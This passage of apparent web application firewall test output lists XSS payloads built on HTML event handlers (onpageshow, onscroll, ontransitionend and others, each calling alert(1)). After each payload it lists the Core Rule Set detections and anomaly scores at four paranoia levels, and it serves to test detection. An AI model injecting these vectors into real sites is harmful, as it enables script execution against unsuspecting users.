941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
Total Incoming Score: 25
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 41
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 54
****** payload-028 ********
Payload:
payload=<img src=validimage.png onloadstart=alert(1)></a>
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
Total Incoming Score: 15
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
Total Incoming Score: 25
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 41
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 54
****** payload-029 ********
Payload:
payload=<body onmessage=alert(1)></a>
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
Total Incoming Score: 15
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
Total Incoming Score: 20
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 36
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 49
****** payload-030 ********
Payload:
payload=<body onpageshow=alert(1)></a>
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
Total Incoming Score: 15
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
Total Incoming Score: 20
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 36
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 49
****** payload-031 ********
Payload:
payload=<audio autoplay onplay=alert(1)><source src=&quot;validaudio.wav&quot; type=&quot;audio/wav&quot;></audio></a>
--- Paranoia Level 1 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
Total Incoming Score: 20
--- Paranoia Level 2 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
Total Incoming Score: 25
--- Paranoia Level 3 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 41
--- Paranoia Level 4 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 77
****** payload-032 ********
Payload:
payload=<audio autoplay onplaying=alert(1)><source src=&quot;validaudio.wav&quot; type=&quot;audio/wav&quot;></audio></a>
--- Paranoia Level 1 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
Total Incoming Score: 20
--- Paranoia Level 2 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
Total Incoming Score: 25
--- Paranoia Level 3 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 41
--- Paranoia Level 4 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 77
****** payload-033 ********
Payload:
payload=<body onpopstate=alert(1)></a>
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
Total Incoming Score: 15
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
Total Incoming Score: 20
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 36
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 49
****** payload-034 ********
Payload:
payload=<applet onreadystatechange=alert(1)></applet></a>
--- Paranoia Level 1 ---
941290 PL1 IE XSS Filters - Attack Detected.
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
Total Incoming Score: 25
--- Paranoia Level 2 ---
941290 PL1 IE XSS Filters - Attack Detected.
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
Total Incoming Score: 30
--- Paranoia Level 3 ---
941290 PL1 IE XSS Filters - Attack Detected.
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 46
--- Paranoia Level 4 ---
941290 PL1 IE XSS Filters - Attack Detected.
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 59
****** payload-035 ********
Payload:
payload=<svg><animate onrepeat=alert(1) attributeName=x dur=1s repeatCount=2 /></a>
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
Total Incoming Score: 15
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
Total Incoming Score: 18
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 34
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 47
****** payload-036 ********
Payload:
payload=<body onresize=&quot;alert(1)&quot;></a>
--- Paranoia Level 1 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
Total Incoming Score: 15
--- Paranoia Level 2 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
Total Incoming Score: 20
--- Paranoia Level 3 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
Total Incoming Score: 30
--- Paranoia Level 4 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 59
****** payload-037 ********
Payload:
payload=<body onscroll=alert(1)><div style=height:1000px></div><div id=x></div></a>
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
Total Incoming Score: 15
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942340 PL2 Detects basic SQL authentication bypass attempts 3/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
Total Incoming Score: 33
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942340 PL2 Detects basic SQL authentication bypass attempts 3/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 46
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942340 PL2 Detects basic SQL authentication bypass attempts 3/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 59
****** payload-038 ********
Payload:
payload=<marquee onstart=alert(1)>XSS</marquee></a>
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
Total Incoming Score: 15
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
Total Incoming Score: 25
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 38
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 51
****** payload-039 ********
Payload:
payload=<audio controls autoplay ontimeupdate=alert(1)><source src=&quot;validaudio.wav&quot; type=&quot;audio/wav&quot;></audio></a>
--- Paranoia Level 1 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
Total Incoming Score: 20
--- Paranoia Level 2 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
Total Incoming Score: 25
--- Paranoia Level 3 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 41
--- Paranoia Level 4 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 77
****** payload-040 ********
Payload:
payload=<style>:target {color: red;}</style><a id=x style=&quot;transition:color 10s&quot; ontransitioncancel=alert(1)></a></a>
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
Total Incoming Score: 15
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
Total Incoming Score: 28
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 50
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 84
****** payload-041 ********
Payload:
payload=<style>:target {color:red;}</style><a id=x style=&quot;transition:color 1s&quot; ontransitionend=alert(1)></a></a>
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
